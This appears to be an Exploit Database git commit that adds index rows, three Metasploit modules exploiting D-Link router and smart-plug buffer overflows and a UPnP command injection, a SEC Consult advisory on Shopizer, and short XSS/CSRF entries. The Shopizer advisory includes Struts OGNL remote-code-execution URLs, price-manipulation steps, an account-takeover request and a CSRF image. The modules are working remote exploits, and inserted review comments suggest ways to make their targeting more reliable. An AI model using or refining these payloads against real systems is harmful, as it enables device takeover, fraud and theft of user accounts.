Updated 07_16_2014

Offensive Security 2014-07-16 04:39:45 +00:00
parent 9b54da834d
commit f8cf6671cf
15 changed files with 1119 additions and 0 deletions


@ -30653,6 +30653,7 @@ id,file,description,date,author,platform,type,port
34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0
34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0
34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
@ -30672,3 +30673,16 @@ id,file,description,date,author,platform,type,port
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80
34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
34065,platforms/hardware/remote/34065.rb,"D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,metasploit,hardware,remote,1900
34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0
34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 'smart_statistics_admin.php' Cross Site Scripting Vulnerability",2010-01-10,R3d-D3V!L,php,webapps,0
34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-01-01,"Truong Thao Nguyen",php,webapps,0
34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 CSS 'expression' Remote Denial of Service Vulnerability",2010-01-01,MustLive,windows,dos,0
34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ Multiple Cross Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0
34071,platforms/php/webapps/34071.txt,"Joomla! 'com_sar_news' Component 'id' Parameter SQL Injection Vulnerability",2010-06-02,LynX,php,webapps,0
34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 'hexjector.php' Cross Site Scripting Vulnerability",2010-06-01,hexon,php,webapps,0
34073,platforms/php/webapps/34073.py,"TCExam <= 10.1.7 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload Vulnerability",2010-06-02,"John Leitch",php,webapps,0
34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti Insecure Cookie Authentication Bypass Vulnerability",2010-06-02,Septemb0x,php,webapps,0


@ -0,0 +1,131 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link info.cgi POST Request Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different D-Link
devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component,
when handling specially crafted POST HTTP requests addresses to the /common/info.cgi
handler. This module has been successfully tested on D-Link DSP-W215 in an emulated
environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial PoC
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
['OSVDB', '108249'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.02',
{
'Offset' => 477472,
'Ret' => 0x405cec # jump to system - my_cgi.cgi
}
]
],
'DisclosureDate' => 'May 22 2014',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => "/common/info.cgi",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end
print_status("#{peer} - Exploiting #{@my_target.name}...")
execute_cmdstager(
:flavor => :echo,
:linemax => 185
)
end
def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << [@my_target.ret].pack("N") # Overwrite $ra -> jump to system
# la $t9, system
# la $s1, 0x440000
# jalr $t9 ; system
# addiu $a0, $sp, 0x28 # our command
buf << rand_text_alpha_upper(40) # Command to execute must be at $sp+0x28
buf << cmd # Command to execute
buf << "\x00" # NULL terminate the command
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/common/info.cgi",
'encode_params' => false,
'vars_post' => {
'storage_path' => shellcode,
}
}, 5)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
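Review bot: The firmware fingerprint in `check` leaves the dot unescaped, `res.body =~ /1.02/`, so a banner containing `1102` or `1-02` is also taken as firmware 1.02 and the hard-coded return address of that target gets auto-selected; anchor it as `res.body =~ /1\.02/`. The same unescaped dot is in the HNAP module's `check` (`/1.07/`, `/1.06/`, `/1.00/`). The `rescue ::Rex::ConnectionError` branch answers `Exploit::CheckCode::Safe`, but a refused connection says nothing about whether the device is patched; `Exploit::CheckCode::Unknown` is the honest result there, in both modules. `execute_command` never reads `opts`; naming it `_opts` makes clear the parameter is presumably kept only for the CmdStager callback contract.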


@ -0,0 +1,152 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link HNAP Request Remote Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different
D-Link devices. The vulnerability is due to an stack based buffer overflow while
handling malicious HTTP POST requests addressed to the HNAP handler. This module
has been successfully tested on D-Link DIR-505 in an emulated environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
['CVE', '2014-3936'],
['BID', '67651'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.0',
{
'Offset' => 1000000,
'Ret' => 0x405cac, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.06',
{
'Offset' => 30000,
'Ret' => 0x405234, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.07',
{
'Offset' => 30000,
'Ret' => 0x405c5c, # jump to system - my_cgi.cgi
}
]
],
'DisclosureDate' => 'May 15 2014',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => "/HNAP1/",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
if res.body =~ /DIR-505/ && res.body =~ /1.07/
@my_target = targets[3] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end
print_status("#{peer} - Exploiting #{@my_target.name}...")
execute_cmdstager(
:flavor => :echo,
:linemax => 185
)
end
def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << rand_text_alpha_upper(4) # $s0, don't care
buf << rand_text_alpha_upper(4) # $s1, don't care
buf << rand_text_alpha_upper(4) # $s2, don't care
buf << rand_text_alpha_upper(4) # $s3, don't care
buf << rand_text_alpha_upper(4) # $s4, don't care
buf << [@my_target.ret].pack("N") # $ra
# la $t9, system
# la $s1, 0x440000
# jalr $t9 ; system
# addiu $a0, $sp, 0x28 # our command
buf << rand_text_alpha_upper(40) # Stack filler
buf << cmd # Command to execute
buf << "\x00" # NULL-terminate the command
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/HNAP1/",
'encode_params' => false,
'data' => shellcode
}, 5)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
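Review bot: `check` selects the auto-target by position, `targets[3]`, `targets[2]` and `targets[1]`, so inserting or reordering an entry in the Targets list silently pairs a fingerprinted device with another entry's `Offset`/`Ret`; looking the entry up by name, e.g. `targets.find { |t| t.name.include?('DIR-505 - v1.07') }`, keeps the fingerprint and the table in step. The info.cgi module has the same positional lookup with `targets[1]`. The DSP-W215 branch matches `/1.00/` while its target is labelled `v1.0`; worth confirming which firmware string the banner actually carries and aligning the two so the intended match is visible.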


@ -0,0 +1,146 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip
has initially reported the DIR-815 vulnerable. Probably there are other devices also
affected.
},
'Author' =>
[
'Zachary Cutlip', # Vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
],
'DisclosureDate' => 'Feb 01 2013',
'Privileged' => true,
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
}
]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(1900)
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
res = nil
1.upto(5) do
res,_,_ = udp_sock.recvfrom(65535, 1.0)
break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
udp_sock.sendto(pkt, rhost, rport, 0)
end
# UPnP response:
# [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
# we do not check for the Device ID (DIR-645) and for the firmware version because there are different
# dlink devices out there and we do not know all the vulnerable versions
if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:uuid:`#{cmd}`\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
end
def exploit
print_status("#{rhost}:#{rport} - Trying to access the device via UPnP ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to access the vulnerable device")
end
print_status("#{rhost}:#{rport} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 950
)
end
# the packet stuff was taken from the module miniupnpd_soap_bof.rb
# We need an unconnected socket because SSDP replies often come
# from a different sent port than the one we sent to. This also
# breaks the standard UDP mixin.
def configure_socket
self.udp_sock = Rex::Socket::Udp.create({
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
})
add_socket(self.udp_sock)
end
#
# Required since we aren't using the normal mixins
#
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
# Accessor for our UDP socket
attr_accessor :udp_sock
end
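Review bot: The two banner regexes in `check` disagree: the loop's `break if` escapes the dot in `UPnP\/1\.0` while the final `if res &&` test uses `UPnP\/1.0`, so a reply can satisfy one and not the other, and a banner like `UPnP/1x0` passes the second. Hoist one pattern into a frozen constant, `UPNP_BANNER = /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi`, and use it in both places; `break if res && res =~ UPNP_BANNER` also drops the low-precedence `and`. `configure_socket` creates a fresh UDP socket and registers it with `add_socket` on every call, and `execute_command` calls it each time it runs, so sockets accumulate for the life of the session rather than being reused; `self.udp_sock ||= Rex::Socket::Udp.create(...)`, with `add_socket` only on first creation, keeps a single socket. `attr_accessor :udp_sock` sits at the bottom of the class; the file's own convention elsewhere is to group macros with the `include` lines at the top.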

308
platforms/php/webapps/34062.txt Executable file

@ -0,0 +1,308 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20140710-0 >
=======================================================================
title: Multiple critical vulnerabilities in Shopizer webshop
product: Shopizer
vulnerable version: 1.1.5 and below
fixed version: v2 (new codebase)
impact: critical
homepage: http://www.shopizer.com/
found: 2012-01-10
by: Johannes Dahse, Johannes Greil
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
Shopizer is an open source java shopping cart and e-commerce content
management software (CMS). The system is built on Struts 2, Hibernate and
Spring. JQuery ui and ajax are heavily used on the ui as well as DWR and
Struts2-jQuery plug-in. (http://www.shopizer.com/)
Vulnerability overview/description:
- -----------------------------------
Shopizer is prone to at least the following vulnerabilities, some of them are highly
critical:
1.) Remote Command Execution
Shopizer 1.1.5 is using Apache Struts 2.2.1.1 and is thus vulnerable to Remote
Command Execution. Shopizer 1.1.3 and below is built on Apache Struts 2.1.6
and is also affected.
Fore more details please refer to:
* https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm#a18
* http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html
This affects the shop and admin interface (central).
2.) Manipulation of product prices
When buying products in Shopizer the product costs for a single product is
calculated by the selected quantity times the price of the product. The
total costs of all products is the adding of all product costs. An attacker
can specify negative quantities to decrease the total costs.
This affects the shop.
3.) Manipulation of customer data / mass assignment
An attacker can change the contact details of a customer by modifying the
customerId in the change request. In example this allows him to modify the
shipping address to retrieve products bought by another customer.
Furthermore, a malicious admin user (sm-central) is able to change the
passwords of other user accounts by appending a "customer.customerPassword"
HTTP parameter when saving user details. This is possible _although_ there
is no UI (form field) for this within the admin interface.
This affects the shop and admin interface (central).
4.) Cross-Site Request Forgery
Modifying customer data is also prone to CSRF attacks. Additionally, the
attacker can change customer passwords, shop configuration, product details
and product prices by sending CSRF requests to the administration interface.
This affects the shop and admin interface (central).
5.) Missing anti brute force protection
No protection against brute force attacks regarding login credentials is
implemented. Attackers can guess for weak passwords of users, as the
password policy of the shop only allows exactly between 6 and 8 characters.
The use of special chars or digits is not being enforced.
This affects the shop and admin interface (central).
6.) Cross-Site Scripting
The Shopizer Admin Interface suffers from multiple reflected XSS
vulnerabilities.
Proof of concept:
- -----------------
1.) Remote Command Execution in Struts
a) Via exception
The following URL will trigger an exception for an invalid "productId" data
type and Struts will re-evaluate the specified value as OGNL expression. An
attacker can successfully bypass security restrictions of Struts and execute
arbitrary Java code, leading to Remote Command Execution.
/shop/product/reviews.action?product.productId=secconsult'%2b(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
Other numeric parameters are affected as well.
b) Via ParameterInterceptor
The following URL will store a OGNL expression in the property "search" of
type String. This OGNL expression can then be accessed by a dynamic function
call in another parameter leading to Remote Command Execution.
/shop/search.action?search=(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))(secconsult)&z[(search)('secconsult')]=true
2.) Manipulation of product prices
Assuming the shop has a product1 (300$) and a product2 (290$) for the total
costs of 590$. The following steps can be reproduced by a malicious user to
decrease the total costs when buying those products:
a) Add product1 and product2 to the shopping cart
b) Go to the shopping cart and press "recalculate"
c) Intercept the ajax DWR request and modify the number reference of the
parameter "productQuantity" for product2 to a negative value (-1):
c0-e3=string:2
c0-e4=number:-1
c0-e1=Object_Object:{productId:reference:c0-e3, productQuantity:reference:c0-e4}
d) The new costs for product2 now recalculate to: -1 x 290 = -290$
e) the new total costs is: product1 + product2 = 300$ + (-290$) = 10$
f) continue shopping and pay 10$ for products worth 590$.
This is especially critical for shops that only provide digital products.
Furthermore, during the second step of the checkout process it is
possible to add a negative quantity of products exploiting a Shopizer's
feature called "standalone shopping cart". This results in a negative price.
By issuing the following specially crafted request in the separate tab of
the web browser, while the first tab contains the second step of the checkout
process, the total price will be decreased. Note that the page must be
refreshed after the request to reflect the changes.
/shop/cart/addToCart?merchantId=1&productId=43&qty=-240
3.) Manipulation of customer data / mass assignment
It's possible to overwrite user data of an arbitrary
user and gain access to his account and personal information _when
registering a new user_.
To achieve this, a malicious user has to add the customer.customerId
parameter to the HTTP request and specify the value of the parameter
to match the target user e.g. 87 when registering a new user.
For example, the following request will overwrite the user data
including username and password of the user with the ID 87.
POST /shop/profile/register.action HTTP/1.1
[...]
struts.token.name=struts.token&struts.token=8393EPOT4BN4CNYAJ6ETRI9DNR2FSP1R&formstate=list&customer.customerNick=SecTest&newPassword=SecTest123&repeatNewPassword=SecTest123&customer.customerCompany=SecTest&customer.customerGender=M&customer.customerTitel=SecTest&customer.customerFirstname=SecTest&customer.customerLastname=SecTest&customer.customerTelephone=&customer.customerEmailAddress=sectest@example.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=SecTest&customer.customerCity=SecTest&customer.customerStreetAddress=SecTest&customer.customerHouseAddress=SecTest&captcha_honeypot=&customer.customerPrivacyRules=1&customer.customerId=87
In this case no account confirmation is needed. Instant access
to the overwritten account and its data is possible using the
new username SecTest and the newly specified password! An attacker is able to
access sensitive data (order information,
personal information etc.).
Additionally, the following request will overwrite the contact data of customer id 10,
including the name, shipping address and billing address:
/shop/profile/changeAddress.action?formstate=list&customer.customerId=10&customer.customerCompany=secconsult&customer.customerGender=&customer.customerTitel=&customer.customerFirstname=secconsult&customer.customerLastname=secconsult&customer.customerTelephone=00&customer.customerEmailAddress=owned@secconsult.com&customer.customerCountryId=14&customer.customerZoneId=95&customer.customerPostalCode=1190&customer.customerCity=secconsult&customer.customerStreetAddress=secconsult&customer.customerHouseAddress=17&customer.customerAnonymous=false&customer.customerBillingTitel=&customer.customerBillingFirstName=secconsult&customer.customerBillingLastName=secconsult&customer.customerBillingStreetAddress=secconsult&customer.customerBillingHouseAddress=17&customer.customerBillingCity=secconsult&customer.customerBillingZoneId=95&customer.customerBillingState=secconsult&customer.customerBillingPostalCode=1190&customer.customerBillingCountryId=14&customer.customerLang=de&customer.customerPrivacyRul
es=1&customer.
customerNick=secconsult
Note that in this specific case the account of the attacker and the victim will not
be able to login again after the attack, because the nickname will be
overwritten and found twice during login.
Furthermore, the administration interface does not offer a UI to change user
passwords. By appending the parameter "customer.customerPassword" an attacker
is able to change the password of arbitrary users within the customer details
page.
4.) Cross-Site Request Forgery
The following image will alter the product price for the product 30 when
rendered by the browser of an logged in webshop administrator:
<img
src="/central/catalog/saveproduct.action?categ=30&product.productType=1&product.productStatus=true&__checkbox_product.productStatus=true&__checkbox_product.productVirtual=true&__checkbox_product.productIsFree=false&dateavailable=2012-01-24&price=1.00&product.productExternalDl=1&names[0]=secconsult&seo[0]=secconsult&title[0]=secconsult&highlights[0]=secconsult&descriptions[0]=secconsult&metadescriptions[0]=secconsult&downloadurl[0]=&uploadimage=&weight=1.0&width=1.0&length=1.0&height=1.0&product.productQuantity=99&product.productQuantityOrderMax=99&product.productSortOrder=1&product.productTaxClassId=1&product.productId=30&product.productImage=&product.productImageLarge=&product.productImage1=&product.productImage2=&product.productImage3=&product.productImage4="/>
Furthermore, the parameter "__checkbox_product.productIsFree" can also be set
to "true".
Additionally, the administration interface allows to overwrite the password
hash of every customer which can also be exploited via CSRF.
The product review form is also vulnerable to Cross-Site Request Forgery
attacks. A similar request to the following URL will result in a product
review being posted in the context of the currently logged in user. Note
that the URL does not contain any parameter that is holding a nonce value.
/shop/product/createReview.action?product.productId=43&rating=5&star=5&reviewText=Excellent&=
5.) Missing anti brute force protection
No proof-of-concept is necessary. See source:
sm-central/src/com/salesmanager/central/profile/ProfileAction.java
Line 525 - 530 of shopizer 1.1.5
6.) Cross-Site Scripting
/central/orders/searchcriteria.action?customername="><script>alert(document.cookie)</script>
/central/catalog/productlist.action?productname="><script>alert(document.cookie)</script>&availability=2"><script>alert(document.cookie)</script>&status=2"><script>alert(document.cookie)</script>
E.g. source code:
sm-central/WebContent/orders/orderlist.jsp
Line: 118
SEC Consult assumes, that many more XSS vulnerabilities exist within this
software as no proper filtering is implemented.
Vulnerable / tested versions:
- -----------------------------
All vulnerabilities could be reproduced with Shopizer 1.1.5 and 1.1.3
Vendor contact timeline:
- ------------------------
2012-01-10: The vulnerabilities have been found during a short blackbox test
of a shopizer installation during a customer project
2012-12-20: Customer allows contacting vendor
2013-01-10: Contacting vendor through support@shopizer.com, fast reply,
sending advisory
2013-01-22: Asking for status update, reply: vendor takes a look
2013-02-26: Asking for status update, vendor has some questions regarding
version numbers
2013-03-22: Asking for status update again
2013-03-23: Vendor: Release 2 is scheduled for June
2013-06-25: Asking for status update, no answer
2013-07-01: Sending deadline for advisory release
2013-07-07: Vendor: Version 2 of shopizer delayed
2013-07-08: Asking for new release date
2013-07-09: Vendor: moving from Struts to Spring & Spring security
2013-10-03: Asking again for release date
2013-10-06: Vendor: Release shortly
2013-12-10: Asking for update
2013-12-12: Vendor: Release date set for January 2014
2014-06: Vendor releases v2
2014-07-10: SEC Consult releases security advisory
Solution:
- ---------
Using the old version branch 1.x is not recommended as there are no security
fixes implemented by the vendor.
Version 2 has been released by the vendor, but it has not been tested by SEC
Consult and it is unclear whether the issues have been solved.
Workaround:
- -----------
These workarounds have to be implemented in source:
* Update the Apache Struts library to the latest version available.
* Disallow negative product quantities.
* Identify customers by session and not by customerId parameter.
Furthermore, change the default login (admin:password) for the administration
interface.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF J. Dahse, J. Greil / 2012, 2013, 2014
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQEcBAEBAgAGBQJTvmP8AAoJECyFJyAEdlkKIvIH/jN5QXxf98jLswdxXH7bpHND
OmX43+f2o119h7jphQierfe2Fj5NqG3l+9Gldb601SYtdOXldI5Dn/GSByZb0NbD
Xn5i9SeRNzbxPghCX7JubHaJX86HKoxrks34Hgoe7/v5A4rkIs3XA868tIODWq/j
FCSnwn3I7DQu8lSR1PzbzTX2aOnilTAdmSTFH5MahMXrVgk3YHwNbtVIDz6/xriW
ynsvLr709i/fQWEhwo4OoTwhyHwhrjPjY3jQNhcO70OMjG1kWqULFySGWNeVof0k
a2K/EHcqiDPFyrpHifvVheOeQaPoFO5CL/Ze7cV7B9vRi9WPo3Y07wNfnJiYOdY=
=3Hvl
-----END PGP SIGNATURE-----

10
platforms/php/webapps/34067.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40468/info
Smart Statistics is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Smart Statistics 1.0 is vulnerable; other versions may also be affected.
http:/www.example.com/74rG37_H057/smart_statistics_admin.php?type=page&name=">><FONT SIZE="70" FACE="courier" COLOR=red><MARQUEE BEHAVIOR=SCROLL HEIGHT=25 WIDTH=300 BGColor=navy>R3d-D3v!L W@S h3R3</MARQUEE></FONT>


@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/40483/info
CMS Made Simple is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied inputs. The application is also prone to a cross-site request-forgery vulnerability.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The attacker can exploit the cross-site request-forgery issue by tricking a victim into following a specially crafted HTTP request designed to perform some action on the attacker's behalf using a victim's currently active session.
CMS Made Simple 1.7.1 and prior are vulnerable.
<form name="csrf"
action="http://www.example.com:7080/config/confMgr.php"
method="post" target="hidden">
<input type="hidden" name="a" value="s" />
<input type="hidden" name="m" value="admin" />
<input type="hidden" name="p" value="security" />
<input type="hidden" name="t" value="`ADMIN_USR_NEW" />
<input type="hidden" name="r" value="" />
<input type="hidden" name="file_create" value="" />
<input type="hidden" name="name" value="owned" />
<input type="hidden" name="pass" value="password" />
<input type="hidden" name="pass1" value="password" />
</form>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40488/info
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/smilies_popup.php?details_var=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
http://www.example.com/manage_pictures.php?profile_id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40501/info
